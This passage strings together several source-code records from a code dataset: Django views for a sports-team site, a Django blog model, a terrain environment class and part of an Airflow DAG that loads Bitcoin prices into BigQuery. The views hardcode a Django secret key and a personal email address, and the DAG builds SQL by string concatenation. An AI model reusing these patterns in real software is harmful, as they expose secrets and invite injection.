make_password,check_password\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.urls import reverse\nfrom django.core.mail import send_mail\nfrom django.utils import timezone\nfrom operator import itemgetter, attrgetter\nfrom datetime import datetime, timedelta\nimport pandas as pd\nimport re\nfrom django.core.mail import send_mail\nimport base64\nfrom itsdangerous import URLSafeTimedSerializer as utsr\nimport openpyxl\nfrom openpyxl import 
Workbook\nimport requests\nimport urllib\nfrom urllib.request import urlretrieve\n\nSECRET_KEY = '))wug4^rwwoiup4#9an29f5pk=uw#d()fkv@_*(a0sf9%rd9tc'\nSECRET_KEY = bytes(SECRET_KEY,encoding = 'utf-8')\n\n#token_confirm = Token(SECRET_KEY)\n\n
\nclass Token():\n\t# Wraps itsdangerous' URLSafeTimedSerializer to build and check the email-activation tokens.\n\tdef __init__(self,security_key):\n\t\tself.security_key = security_key\n\t\t# base64.encodestring was removed in Python 3.9; encodebytes is the drop-in replacement\n\t\tself.salt = base64.encodebytes(security_key)\n\tdef generate_validate_token(self,username):\n\t\tserializer = utsr(self.security_key)\n\t\treturn serializer.dumps(username,self.salt)\n\tdef confirm_validate_token(self,token,expiration=3600):\n\t\tserializer = utsr(self.security_key)\n\t\treturn serializer.loads(token,\n\t\tsalt=self.salt,\n\t\tmax_age=expiration)\n\n\n
\n# Create your views here.\ndef active(request,token):\n\ttoken_confirm = Token(SECRET_KEY)\n\tusername = token_confirm.confirm_validate_token(token)\n\tplayer = Player.objects.get(username=username)\n\tplayer.is_active = True\n\tplayer.save()\n\treturn HttpResponseRedirect('/index/')\n\ndef hello_view(request):\n return render(request, 'system.html', {\n 'data': \"You've got a star!\",\n })\n\ndef index(request):\n\treturn render(request, 'index.html')\n
\ndef register(request):\n\tif request.method == 'GET':\n\t\treturn render(request, 'register.html')\n\tif request.method == 'POST':\n\t\t# generate the email-verification token\n\t\ttoken_confirm = Token(SECRET_KEY)\n\t\tstudent_id = request.POST.get('student_id')\n\t\tpassword = request.POST.get('password')\n\t\tname = request.POST.get('name')\n\t\tsex = request.POST.get('sex')\n\t\tgrade = request.POST.get('grade')\n\t\tif Player.objects.filter(username = student_id).exists():\n\t\t\treturn render(request, 'register.html', {'error_message': 'Already registered student ID'})\n\t\temail = student_id + '@ntu.edu.tw'\n\n\t\tif re.match(r'^[btrd]\\d{8}', student_id) is None:\n\t\t\treturn render(request, 'register.html', {'error_message': 'Invalid student_id'})\n\t\t# NOTE: create_user leaves is_active at the model's default; the activation flow below assumes the account starts inactive\n\t\tplayer = Player.objects.create_user(student_id, email, password)\n\t\tplayer.name = name\n\t\tplayer.sex = sex\n\t\tplayer.grade = grade\n\t\tplayer.save()\n\n\t\ttoken = token_confirm.generate_validate_token(student_id)\n\t\t#active_key = base64.encodestring(username)\n\t\t#send email to the register email\n\t\t#http://0e2983ec5d6e.ngrok.io \n\t\t#http://localhost:8000\n\t\tmessage = \"\\n\".join([\n\t\tu'{0},歡迎加入資管系隊系統~~'.format(student_id),\n\t\tu'請訪問下方連結,完成使用者驗證:',\n\t\t'/'.join(['http://localhost:8000/active',token])\n\t\t])\n\t\tsend_mail(u'註冊使用者驗證資訊',message,'leo19990709@gmail.com',[email,])\n\n\t\t#auth.login(request, player)\n\t\treturn HttpResponseRedirect('/index/')\n\n
\ndef login(request):\n\tif request.method == 'GET':\n\t\treturn render(request, 'login.html')\n\tif request.method == 'POST':\n\t\tif request.user.is_authenticated:\n\t\t\treturn HttpResponseRedirect('/mainpage/')\n\t\tstudent_id = request.POST.get('student_id')\n\t\tpassword = request.POST.get('password')\n\t\tuser = auth.authenticate(username=student_id, password=password)\n\t\tif user is not None and user.is_active == True:\n\t\t\tauth.login(request, user)\n\t\t\treturn HttpResponseRedirect('/mainpage/')\n\t\telse:\n\t\t\treturn render(request, 'login.html', {'alert_flag': True})\n\ndef logout(request):\n\tauth.logout(request)\n\treturn HttpResponseRedirect('/index/')\n
\ndef mainpage(request):\n\tif request.user.is_authenticated:\n\t\tif request.method == 'GET':\n\t\t\tcurrent_user = request.user\n\t\t\tcurrent_playing_sport = Playing_Sport.objects.filter(player = current_user)\n\t\t\tpersonal_photo = 
current_user.personal_photo\n\t\t\tcurrent_team = []\n\t\t\ttraining_to_see = []\n\t\t\tvoting_to_see = []\n\t\t\tnoticing_to_see = []\n\t\t\tis_captain = False\n\t\t\tfor i in current_playing_sport:\n\t\t\t\tcurrent_team.append(i.sport_name)\n\t\t\tfor i in current_team:\n\t\t\t\ttraining_to_see += Training.objects.filter(sport_name = i, expire_time__gte = timezone.now())\n\t\t\t\tvoting_to_see += Voting.objects.filter(sport_name = i, expire_time__gte = timezone.now())\n\t\t\t\tnoticing_to_see += Noticing.objects.filter(sport_name = i, expire_time__gte = timezone.now())\n\t\t\t\tteam = Team.objects.get(sport_name = i)\n\t\t\t\tif team.captain == current_user:\n\t\t\t\t\tis_captain = True\n\t\t\t\t\tis_captain_team = team.sport_name\n\t\t\ttraining_to_see.sort(key = attrgetter('create_time'))\n\t\t\tvoting_to_see.sort(key = attrgetter('create_time'))\n\t\t\tnoticing_to_see.sort(key = attrgetter('create_time'))\n\t\t\ttraining_to_see.reverse()\n\t\t\tvoting_to_see.reverse()\n\t\t\tnoticing_to_see.reverse()\n\t\t\tif training_to_see:\n\t\t\t\tnext_training = training_to_see[0]\n\t\t\treturn render(request, 'mainpage.html', locals())\n\n\t\tif request.method == 'POST':\n\t\t\tif request.POST.get('submit'):\n\t\t\t\tsubmit_type = request.POST.get('submit')\n\t\t\t\tif submit_type == 'noticing':\n\t\t\t\t\tcurrent_user = request.user\n\t\t\t\t\tposter = current_user\n\t\t\t\t\tsport_name = request.POST.get('sport_name')\n\t\t\t\t\tsport_input = Team.objects.filter(sport_name = sport_name)\n\t\t\t\t\texpire_time = request.POST.get('expire_time')\n\t\t\t\t\tparagraph = request.POST.get('paragraph')\n\t\t\t\t\tNoticing.objects.create(poster = poster, sport_name = sport_input[0], expire_time = expire_time, paragraph = paragraph)\n\t\t\t\telif submit_type == 'training':\n\t\t\t\t\tcurrent_user = request.user\n\t\t\t\t\tposter = current_user\n\t\t\t\t\tsport_name = request.POST.get('sport_name')\n\t\t\t\t\tsport_input = Team.objects.filter(sport_name = sport_name)\n\t\t\t\t\ttime = request.POST.get('time')\n\t\t\t\t\tend_time = request.POST.get('end_time')\n\t\t\t\t\tcourt = request.POST.get('court')\n\t\t\t\t\tTraining.objects.create(poster = poster, sport_name = sport_input[0], time = time, end_time = end_time, expire_time = time, court = court)\n\t\t\t\telif submit_type == 'participate_train':\n\t\t\t\t\tcurrent_user = request.user\n\t\t\t\t\tnum = request.POST.get('number')\n\t\t\t\t\tcurrent_training = Training.objects.get(id = num)\n\t\t\t\t\tcurrent_playing_sport = Playing_Sport.objects.get(player = current_user, sport_name = current_training.sport_name)\n\t\t\t\t\t\n\t\t\t\t\tif current_playing_sport in current_training.participant.all():\n\t\t\t\t\t\tpass\n\t\t\t\t\telse:\n\t\t\t\t\t\tif current_playing_sport.sport_name.sport_name == '羽球':\n\t\t\t\t\t\t\tcurrent_playing_sport.points_left -= 1\n\t\t\t\t\t\t#print(current_playing_sport.points_received + 1)\n\t\t\t\t\t\tcurrent_playing_sport.points_received += 1\n\t\t\t\t\t\t#print(current_playing_sport.points_received)\n\t\t\t\t\t\tcurrent_playing_sport.save()\n\t\t\t\t\t\tcurrent_training.participant.add(current_playing_sport)\n\t\t\t\t\t\tcurrent_training.save()\t\t\t\t\t\t\t\t\t\n\t\t\t\telif submit_type == 'cancel_train':\n\t\t\t\t\tcurrent_user = request.user\n\t\t\t\t\tnum = request.POST.get('number')\n\t\t\t\t\tcurrent_training = Training.objects.get(id = num)\n\t\t\t\t\tcurrent_playing_sport = Playing_Sport.objects.get(player = current_user, sport_name = current_training.sport_name)\n\t\t\t\t\tif current_playing_sport not in 
current_training.participant.all():\n\t\t\t\t\t\tpass\n\t\t\t\t\telse:\n\t\t\t\t\t\tif current_playing_sport.sport_name.sport_name == '羽球':\n\t\t\t\t\t\t\tcurrent_playing_sport.points_left += 1\n\t\t\t\t\t\tcurrent_playing_sport.points_received -= 1\n\t\t\t\t\t\tcurrent_playing_sport.save()\n\t\t\t\t\t\tcurrent_training.participant.remove(current_playing_sport)\n\t\t\t\t\t\tcurrent_training.save()\t\n\t\t\t\telif submit_type == 'voting':\n\t\t\t\t\tcurrent_user = request.user\n\t\t\t\t\tposter = current_user\n\t\t\t\t\tsport_name = request.POST.get('sport_name')\n\t\t\t\t\tsport_input = Team.objects.get(sport_name = sport_name)\n\t\t\t\t\tend_time = request.POST.get('end_time')\n\t\t\t\t\texpire_time = request.POST.get('expire_time')\n\t\t\t\t\tquestion = request.POST.get('question')\n\t\t\t\t\toption_one = request.POST.get('option_one')\n\t\t\t\t\toption_two = request.POST.get('option_two')\n\t\t\t\t\tif request.POST.get('option_three'):\n\t\t\t\t\t\toption_three = request.POST.get('option_three')\n\t\t\t\t\t\tVoting.objects.create(poster = poster, sport_name = sport_input, end_time = end_time, expire_time = expire_time, question = question, option_one = option_one, option_two = option_two, option_three = option_three)\n\t\t\t\t\telse:\n\t\t\t\t\t\tVoting.objects.create(poster = poster, sport_name = sport_input, end_time = end_time, expire_time = expire_time, question = question, option_one = option_one, option_two = option_two)\n\t\t\t\telif submit_type == 'govote':\n\t\t\t\t\tcurrent_user = request.user\n\t\t\t\t\tnum = request.POST.get('number')\n\t\t\t\t\tcurrent_voting = Voting.objects.get(id = num)\n\t\t\t\t\tcurrent_playing_sport = Playing_Sport.objects.get(player = current_user, sport_name = current_voting.sport_name)\n\t\t\t\t\tif current_playing_sport in current_voting.participant.all():\n\t\t\t\t\t\tpass\n\t\t\t\t\telse:\n\t\t\t\t\t\tcurrent_user_weighted = current_playing_sport.points_received // 5 + 1\n\t\t\t\t\t\tif request.POST.get('answer'):\n\t\t\t\t\t\t\tcurrent_voting.participant.add(current_playing_sport)\n\t\t\t\t\t\t\tanswer = request.POST.get('answer')\n\t\t\t\t\t\t\tif answer == 'one':\n\t\t\t\t\t\t\t\tcurrent_voting.option_one_cnt += current_user_weighted\n\t\t\t\t\t\t\telif answer == 'two':\n\t\t\t\t\t\t\t\tcurrent_voting.option_two_cnt += current_user_weighted\n\t\t\t\t\t\t\telif answer =='three':\n\t\t\t\t\t\t\t\tcurrent_voting.option_three_cnt += current_user_weighted\n\t\t\t\t\t\t\tcurrent_voting.save()\t\t\t\t\t\t\n\t\t\t\treturn HttpResponseRedirect('/mainpage/')\n\telse:\n\t\treturn HttpResponseRedirect('/login/')\n\ndef settings(request):\n\tif request.user.is_authenticated:\n\t\tif request.method == 'GET':\n\t\t\treturn render(request, 'settings.html', locals())\n\t\tif request.method == 'POST':\n\t\t\tcurrent_user = request.user\n\t\t\tif request.POST.get('password'):\n\t\t\t\tpassword = request.POST.get('password')\n\t\t\t\tuser = auth.authenticate(username=current_user.username, password=password)\n\t\t\t\tif user is not None and user.is_active == True:\n\t\t\t\t\tif request.POST.get('name'):\n\t\t\t\t\t\tnew_name = request.POST.get('name')\n\t\t\t\t\t\tcurrent_user.name = new_name\n\t\t\t\t\t\tcurrent_user.save()\n\t\t\t\t\tif request.POST.get('telephone'):\n\t\t\t\t\t\tnew_telephone = request.POST.get('telephone')\n\t\t\t\t\t\tcurrent_user.telephone = new_telephone\n\t\t\t\t\t\tcurrent_user.save()\n\t\t\t\t\tif request.FILES.get('personal_photo'):\n\t\t\t\t\t\tnew_personal_photo = 
request.FILES.get('personal_photo')\n\t\t\t\t\t\tcurrent_user.personal_photo = new_personal_photo\n\t\t\t\t\t\tcurrent_user.save()\n\t\t\t\t\tif request.FILES.get('student_card_front'):\n\t\t\t\t\t\tnew_student_card_front = request.FILES.get('student_card_front')\n\t\t\t\t\t\tcurrent_user.student_card_front = new_student_card_front\n\t\t\t\t\t\tcurrent_user.save()\n\t\t\t\t\tif request.FILES.get('student_card_back'):\n\t\t\t\t\t\tnew_student_card_back = request.FILES.get('student_card_back')\n\t\t\t\t\t\tcurrent_user.student_card_back = new_student_card_back\n\t\t\t\t\t\tcurrent_user.save()\n\t\t\t\t\tif request.FILES.get('ID_card'):\n\t\t\t\t\t\tnew_ID_card = request.FILES.get('ID_card')\n\t\t\t\t\t\tcurrent_user.ID_card = new_ID_card\n\t\t\t\t\t\tcurrent_user.save()\n\t\t\t\t\tif request.FILES.get('proof'):\n\t\t\t\t\t\tnew_proof = request.FILES.get('proof')\n\t\t\t\t\t\tcurrent_user.proof = new_proof\n\t\t\t\t\t\tcurrent_user.save()\n\t\t\t\telse:\n\t\t\t\t\talert_flag = True\n\t\t\t\t\treturn render(request, 'settings.html', locals())\n\n\t\treturn HttpResponseRedirect('/mainpage/')\n\telse:\n\t\treturn HttpResponseRedirect('/login/')\n\ndef applyteam(request):\n\tif request.user.is_authenticated:\n\t\tif request.method == 'GET':\n\t\t\tteam = Team.objects.all()\n\t\t\treturn render(request, 'apply_team.html', locals())\n\t\tif request.method == 'POST':\n\t\t\tcurrent_user = request.user\n\t\t\tif request.POST.get('password'):\n\t\t\t\tpassword = request.POST.get('password')\n\t\t\t\tuser = auth.authenticate(username=current_user.username, password=password)\n\t\t\t\tif user is not None and user.is_active == True:\n\t\t\t\t\tapplying_team = request.POST.get('team')\n\t\t\t\t\ttarget_team = Team.objects.get(sport_name = applying_team)\n\t\t\t\t\tif target_team.sport_name == '羽球':\n\t\t\t\t\t\tPlaying_Sport.objects.create(player = current_user, sport_name = target_team, points_left = 10)\n\t\t\t\t\telse:\n\t\t\t\t\t\tPlaying_Sport.objects.create(player = current_user, sport_name = target_team, points_left = 0)\n\t\t\t\telse:\n\t\t\t\t\talert_flag = True\n\t\t\t\t\tteam = Team.objects.all()\n\t\t\t\t\treturn render(request, 'apply_team.html', locals())\n\n\t\treturn HttpResponseRedirect('/mainpage/')\n\telse:\n\t\treturn HttpResponseRedirect('/login/')\n\ndef manageteam(request):\n\tif request.user.is_authenticated:\n\t\tif request.method == 'GET':\n\t\t\tcurrent_user = request.user\n\t\t\tcurrent_playing_sport = Playing_Sport.objects.filter(player = current_user)\n\t\t\tcurrent_team = []\n\t\t\tis_captain = False\n\t\t\tfor i in current_playing_sport:\n\t\t\t\tcurrent_team.append(i.sport_name)\n\t\t\tfor i in current_team:\n\t\t\t\tteam = Team.objects.get(sport_name = i)\n\t\t\t\tif team.captain == current_user:\n\t\t\t\t\tis_captain = True\n\t\t\t\t\tbreak\n\t\t\tif is_captain == False:\n\t\t\t\treturn HttpResponseRedirect('/mainpage/')\n\t\t\tteam_availible_time = Availible_Day_Sport.objects.get(sport_name = team)\n\t\t\tteam_member = Playing_Sport.objects.filter(sport_name = team)\n\t\t\treturn render(request, 'manageteam.html', locals())\n\t\tif request.method == 'POST':\n\t\t\tcurrent_user = request.user\n\t\t\tcurrent_playing_sport = Playing_Sport.objects.filter(player = current_user)\n\t\t\tcurrent_team = []\n\t\t\tis_captain = False\n\t\t\tfor i in current_playing_sport:\n\t\t\t\tcurrent_team.append(i.sport_name)\n\t\t\tfor i in current_team:\n\t\t\t\tteam = Team.objects.get(sport_name = i)\n\t\t\t\tif team.captain == current_user:\n\t\t\t\t\tis_captain = 
True\n\t\t\t\t\tbreak\n\t\t\tif request.POST.get('submit'):\n\t\t\t\tsubmit_type = request.POST.get('submit')\n\t\t\t\tif request.POST.get('password'):\n\t\t\t\t\tpassword = request.POST.get('password')\n\t\t\t\t\tuser = auth.authenticate(username=current_user.username, password=password)\n\t\t\t\t\tif user is not None and user.is_active == True:\n\t\t\t\t\t\tif submit_type == 'get_team':\n\t\t\t\t\t\t\tmember = request.POST.getlist('members')\n\t\t\t\t\t\t\toutput_list = []\n\t\t\t\t\t\t\tfor i in member:\n\t\t\t\t\t\t\t\ttarget = Player.objects.filter(name = i)\n\t\t\t\t\t\t\t\toutput_list += target.values('name', 'username', 'sex', 'grade', 'telephone', 'personal_photo', 'student_card_front', 'student_card_back', 'ID_card', 'proof')\n\t\t\t\t\t\t\toutput = pd.DataFrame.from_records(output_list)\n\t\t\t\t\t\t\tResult_PATH = 'team_member.xlsx'\n\t\t\t\t\t\t\twriter = pd.ExcelWriter(Result_PATH, engine='xlsxwriter')\n\t\t\t\t\t\t\toutput.to_excel(writer, sheet_name = 'mem_list')\n\t\t\t\t\t\t\twriter.save()\n\t\t\t\t\t\t\t#def down_file(request):\n\t\t\t\t\t\t\twith open('team_member.xlsx', 'rb') as model_excel:\n\t\t\t\t\t\t\t\tresult = model_excel.read()\n\t\t\t\t\t\t\tresponse = HttpResponse(result)\n\t\t\t\t\t\t\tresponse['Content-Disposition'] = 'attachment; filename=team_member_list.xlsx'\n\t\t\t\t\t\t\treturn response\n\t\t\t\t\t\t\t#xlsx_url = 'http://localhost:8000/media/team_member.xlsx'\n\t\t\t\t\t\t\t#urlretrieve(xlsx_url, \"test.xlsx\")\n\t\t\t\t\t\t\tprint(output.head())\n\t\t\t\t\t\t\t#output.to_excel('member_list.xlsx')\n\t\t\t\t\t\telif submit_type == 'change_captain':\n\t\t\t\t\t\t\tnext_captain_name = request.POST.get('captain')\n\t\t\t\t\t\t\tnext_captain = Player.objects.get(name = next_captain_name)\n\t\t\t\t\t\t\tteam.captain = next_captain\n\t\t\t\t\t\t\tteam.save()\n\t\t\t\t\telse:\n\t\t\t\t\t\talert_flag = True\n\t\t\t\t\t\treturn render(request, 'manageteam.html', locals())\n\t\t\treturn HttpResponseRedirect('/mainpage/')\n\telse:\n\t\treturn HttpResponseRedirect('/login/')\n\ndef myinfo(request):\n\tif request.user.is_authenticated:\n\t\tif request.method == 'GET':\n\t\t\tcurrent_user = request.user\n\t\t\tcurrent_playing_sport = Playing_Sport.objects.filter(player = current_user)\n\t\t\treturn render(request, 'myinfo.html', locals())\n\t\tif request.method == 'POST':\n\t\t\tcurrent_user = request.user\n\t\t\tsubmit_type = request.POST.get('submit')\n\t\t\tif submit_type == 'submit_day':\n\t\t\t\tcurrent_playing_sport = Playing_Sport.objects.filter(player = current_user)\n\t\t\t\tcurrent_team = []\n\t\t\t\tfor i in current_playing_sport:\n\t\t\t\t\tcurrent_team.append(i.sport_name)\n\t\t\t\tcurrent_team_availible = []\n\t\t\t\tfor i in current_team:\n\t\t\t\t\tcurrent_team_availible += Availible_Day_Sport.objects.filter(sport_name = i)\n\t\t\t\tif current_user in current_team_availible[0].participant.all():\n\t\t\t\t\tfor i in current_playing_sport:\n\t\t\t\t\t\tcurrent_player_availible = Availible_Day_Player.objects.get(player = i.player, sport_name = i.sport_name)\n\t\t\t\t\t\tadd_team_availible = Availible_Day_Sport.objects.get(sport_name = i.sport_name)\n\t\t\t\t\t\tif current_player_availible.monday == True:\n\t\t\t\t\t\t\tadd_team_availible.monday -= current_player_availible.priority\n\t\t\t\t\t\tif current_player_availible.tuesday == True:\n\t\t\t\t\t\t\tadd_team_availible.tuesday -= current_player_availible.priority\n\t\t\t\t\t\tif current_player_availible.wednesday == True:\n\t\t\t\t\t\t\tadd_team_availible.wednesday -= 
current_player_availible.priority\n\t\t\t\t\t\tif current_player_availible.thursday == True:\n\t\t\t\t\t\t\tadd_team_availible.thursday -= current_player_availible.priority\n\t\t\t\t\t\tif current_player_availible.friday == True:\n\t\t\t\t\t\t\tadd_team_availible.friday -= current_player_availible.priority\n\t\t\t\t\t\tadd_team_availible.participant.remove(current_user)\n\t\t\t\t\t\tadd_team_availible.save()\n\t\t\t\t\t\tcurrent_player_availible.monday = False\n\t\t\t\t\t\tcurrent_player_availible.tuesday = False\n\t\t\t\t\t\tcurrent_player_availible.wednesday = False\n\t\t\t\t\t\tcurrent_player_availible.thursday = False\n\t\t\t\t\t\tcurrent_player_availible.friday = False\n\t\t\t\t\t\tcurrent_player_availible.priority = 0\n\t\t\t\t\t\tcurrent_player_availible.save()\n\t\t\t\t\t#print(add_team_availible.monday, add_team_availible.tuesday, add_team_availible.wednesday, add_team_availible.thursday, add_team_availible.friday)\n\t\t\t\t\tmonday = tuesday = wednesday = thursday = friday = False\n\t\t\t\t\tavailible_time = request.POST.getlist('availible_time')\t\t\t\t\t\n\t\t\t\t\tif 'monday' in availible_time:\n\t\t\t\t\t\tmonday = True\n\t\t\t\t\tif 'tuesday' in availible_time:\n\t\t\t\t\t\ttuesday = True\n\t\t\t\t\tif 'wednesday' in availible_time:\n\t\t\t\t\t\twednesday = True\n\t\t\t\t\tif 'thursday' in availible_time:\n\t\t\t\t\t\tthursday = True\n\t\t\t\t\tif 'friday' in availible_time:\n\t\t\t\t\t\tfriday = True\n\t\t\t\t\tfor i in current_playing_sport:\n\t\t\t\t\t\tpriority = i.points_received // 5 + 1\n\t\t\t\t\t\tcurrent_player_availible = Availible_Day_Player.objects.get(player = i.player, sport_name = i.sport_name)\n\t\t\t\t\t\tcurrent_player_availible.priority = priority\n\t\t\t\t\t\tadd_team_availible = Availible_Day_Sport.objects.get(sport_name = i.sport_name)\n\t\t\t\t\t\tif monday == True:\n\t\t\t\t\t\t\tcurrent_player_availible.monday = True\n\t\t\t\t\t\t\tadd_team_availible.monday += priority\n\t\t\t\t\t\tif tuesday == True:\n\t\t\t\t\t\t\tcurrent_player_availible.tuesday = True\n\t\t\t\t\t\t\tadd_team_availible.tuesday += priority\n\t\t\t\t\t\tif wednesday == True:\n\t\t\t\t\t\t\tcurrent_player_availible.wednesday = True\n\t\t\t\t\t\t\tadd_team_availible.wednesday += priority\n\t\t\t\t\t\tif thursday == True:\n\t\t\t\t\t\t\tcurrent_player_availible.thursday = True\n\t\t\t\t\t\t\tadd_team_availible.thursday += priority\n\t\t\t\t\t\tif friday == True:\n\t\t\t\t\t\t\tcurrent_player_availible.friday = True\n\t\t\t\t\t\t\tadd_team_availible.friday += priority\n\t\t\t\t\t\tcurrent_player_availible.save()\n\t\t\t\t\t\tadd_team_availible.participant.add(current_user)\n\t\t\t\t\t\tadd_team_availible.save()\n\t\t\t\t\t#print(add_team_availible.monday, add_team_availible.tuesday, add_team_availible.wednesday, add_team_availible.thursday, add_team_availible.friday)\n\t\t\t\telse:\t\t\t\t\t\n\t\t\t\t\tmonday = tuesday = wednesday = thursday = friday = False\n\t\t\t\t\tavailible_time = request.POST.getlist('availible_time')\t\t\t\t\t\n\t\t\t\t\tif 'monday' in availible_time:\n\t\t\t\t\t\tmonday = True\n\t\t\t\t\tif 'tuesday' in availible_time:\n\t\t\t\t\t\ttuesday = True\n\t\t\t\t\tif 'wednesday' in availible_time:\n\t\t\t\t\t\twednesday = True\n\t\t\t\t\tif 'thursday' in availible_time:\n\t\t\t\t\t\tthursday = True\n\t\t\t\t\tif 'friday' in availible_time:\n\t\t\t\t\t\tfriday = True\n\t\t\t\t\tfor i in current_playing_sport:\n\t\t\t\t\t\tpriority = i.points_received // 5 + 1\n\t\t\t\t\t\tAvailible_Day_Player.objects.create(player = current_user, sport_name = i.sport_name, monday = 
monday, tuesday = tuesday, wednesday = wednesday, thursday = thursday, friday = friday, priority = priority)\n\t\t\t\t\t\tadd_team_availible = Availible_Day_Sport.objects.get(sport_name = i.sport_name)\n\t\t\t\t\t\tif monday == True:\n\t\t\t\t\t\t\tadd_team_availible.monday += priority\n\t\t\t\t\t\tif tuesday == True:\n\t\t\t\t\t\t\tadd_team_availible.tuesday += priority\n\t\t\t\t\t\tif wednesday == True:\n\t\t\t\t\t\t\tadd_team_availible.wednesday += priority\n\t\t\t\t\t\tif thursday == True:\n\t\t\t\t\t\t\tadd_team_availible.thursday += priority\n\t\t\t\t\t\tif friday == True:\n\t\t\t\t\t\t\tadd_team_availible.friday += priority\n\t\t\t\t\t\tadd_team_availible.participant.add(current_user)\n\t\t\t\t\t\tadd_team_availible.save()\n\n\n\t\treturn HttpResponseRedirect('/mainpage/')\n\telse:\n\t\treturn HttpResponseRedirect('/login/')","repo_name":"COYADI/System-Analysis","sub_path":"sports_team_system/catalog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":20329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12954045556","text":"from django.contrib.auth import get_user_model\nfrom django.db import models\n\nUser = get_user_model()\n\n\nclass Group(models.Model):\n title = models.CharField(max_length=200, verbose_name='Заголовок')\n slug = models.SlugField(\n unique=True,\n verbose_name='Идентификатор')\n description = models.TextField(\n max_length=200,\n blank=True,\n verbose_name='Описание')\n\n class Meta:\n verbose_name = 'Группа'\n verbose_name_plural = 'Группы'\n\n def __str__(self):\n return self.title\n\n\nclass Post(models.Model):\n text = models.TextField(verbose_name='Текст')\n pub_date = models.DateTimeField(auto_now_add=True, verbose_name='Дата')\n author = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n related_name='posts',\n verbose_name='Автор')\n group = models.ForeignKey(\n Group,\n on_delete=models.SET_NULL,\n related_name='posts',\n blank=True, null=True,\n verbose_name='Группа')\n image = models.ImageField(\n 'Картинка',\n upload_to='posts/',\n blank=True\n )\n\n def __str__(self):\n return self.text[:15]\n\n class Meta:\n ordering = ('-pub_date',)\n verbose_name = 'Пост'\n verbose_name_plural = 'Посты'\n","repo_name":"maksyanya/hw04_tests","sub_path":"yatube/posts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"26636590742","text":"from builtins import range\r\nimport time\r\nfrom PerlinNoiseFactory import PerlinNoiseFactory\r\nimport numpy as np\r\nimport math\r\nimport random\r\n\r\n\r\nclass XMLenv:\r\n def __init__(self, max_episode_steps, size=201, obs_size=5, flat_word=False, debug=False):\r\n self.size = size\r\n self.debug = debug\r\n self.obs_size = obs_size\r\n self.flat_world = flat_word\r\n self.terrain_array = self.getTerrain()\r\n self.center = self.size//2\r\n self.max_episode_steps = max_episode_steps\r\n i = math.floor(random.random()*size)\r\n j = math.floor(random.random()*size)\r\n\r\n # coordinate in the form of (x, y, z)\r\n # FLOOR AGENTS X AND Z COORDINATES TO CHECK IF ITS AT THE END COORDINATE (floor -)\r\n self.end_coordinate = (\r\n i-self.center, self.terrain_array[j + self.obs_size, i + self.obs_size]+1, j-self.center)\r\n self.goal = np.array(\r\n [self.end_coordinate[0], self.end_coordinate[2]])\r\n self.start_coordinate = (\r\n 0, 0)\r\n\r\n def getGoal(self):\r\n return self.goal\r\n\r\n def 
getTerrain(self):\r\n        if self.flat_world:\r\n            a = np.array([[5 for j in range(self.size)]\r\n                          for i in range(self.size)])\r\n        else:\r\n            p = PerlinNoiseFactory(2, 4)\r\n            a = np.array([[p(i/self.size, j/self.size)\r\n                           for j in range(self.size)] for i in range(self.size)])\r\n            a = np.abs((a*50).astype(int)) + 5\r\n\r\n        a = np.pad(a, self.obs_size, constant_values=80)\r\n        if self.debug:\r\n            print(\"Terrain Map:\", a)\r\n        return a\r\n\r\n    def inGoal(self, position):\r\n        return (position[0] == self.goal[0]) and (position[1] == self.goal[1])\r\n\r\n    def isEnd(self, position, steps):\r\n        return self.inGoal(position) or steps >= self.max_episode_steps\r\n","repo_name":"sky121/Moogle-Maps","sub_path":"training/XMLenv.py","file_name":"XMLenv.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74566440121","text":"from datetime import datetime\r\nimport os\r\nimport requests\r\n\r\nfrom airflow.decorators import dag\r\nfrom airflow.providers.google.cloud.operators.bigquery import BigQueryCreateEmptyDatasetOperator, BigQueryCreateEmptyTableOperator, BigQueryInsertJobOperator\r\nfrom airflow.operators.python import PythonOperator\r\n\r\n\r\nAPI = \"https://api.coingecko.com/api/v3/simple/price?ids=bitcoin&vs_currencies=usd&include_market_cap=true&include_24hr_vol=true&include_24hr_change=true&include_last_updated_at=true\"\r\nDATASET = \"bitcoin_ds\"\r\nTABLE = \"bitcoin\"\r\nFILE = os.getcwd() + os.sep + \"dags\" + os.sep + \"GCS\" + os.sep + \"bitcoin.sql\" # path of the file that will be created with the insert query to execute\r\n\r\n@dag(dag_id='ab_bq_bitcoin', schedule_interval='@once', start_date=datetime(2021, 1, 1), tags=['iungo', 'gcs'], catchup=False)\r\ndef taskflow():\r\n\r\n    def extract_bitcoin_price():\r\n        return requests.get(API).json()['bitcoin']\r\n\r\n\r\n    def generate_query(ti):\r\n        data = ti.xcom_pull(task_ids='extract_bitcoin_price')\r\n\r\n        query = f\"INSERT {DATASET}.{TABLE} VALUES (\"\r\n        for key in data.keys():\r\n            if key == 'last_updated_at':\r\n                query += \"'\" + str(datetime.fromtimestamp(data[key]).strftime('%Y-%m-%d %H:%M:%S')) + \"'\"\r\n            else:\r\n                query += str(data[key]) + \", \"\r\n\r\n        query += \");\"\r\n\r\n        with open(FILE, 'w') as file:\r\n            file.write(query)\r\n            file.close()\r\n\r\n\r\n    create_empty_dataset = BigQueryCreateEmptyDatasetOperator(\r\n        task_id=\"create_empty_dataset\",\r\n        dataset_id=DATASET,\r\n        gcp_conn_id='google_cloud_default',\r\n        exists_ok=True, # If True, ignore “already exists” errors when creating the table.\r\n    )\r\n\r\n    create_empty_table = BigQueryCreateEmptyTableOperator(\r\n        task_id=\"create_empty_table\",\r\n        dataset_id=DATASET,\r\n        table_id=TABLE,\r\n        bigquery_conn_id='google_cloud_default',\r\n        schema_fields=[\r\n            {'name': 'usd', 'type': 'INTEGER', 'mode': 'REQUIRED'},\r\n            {'name': 'usd_market_cap', 'type': 'DECIMAL', 'mode': 'NULLABLE'},\r\n            {'name': 'usd_24_vol', 'type': 'DECIMAL', 'mode': 'NULLABLE'},\r\n            {'name': 'usd_24_change', 'type': 'DECIMAL', 'mode': 'REQUIRED'},\r\n            {'name': 'last_updated_at', 'type': 'TIMESTAMP', 'mode': 'REQUIRED'},\r\n        ],\r\n        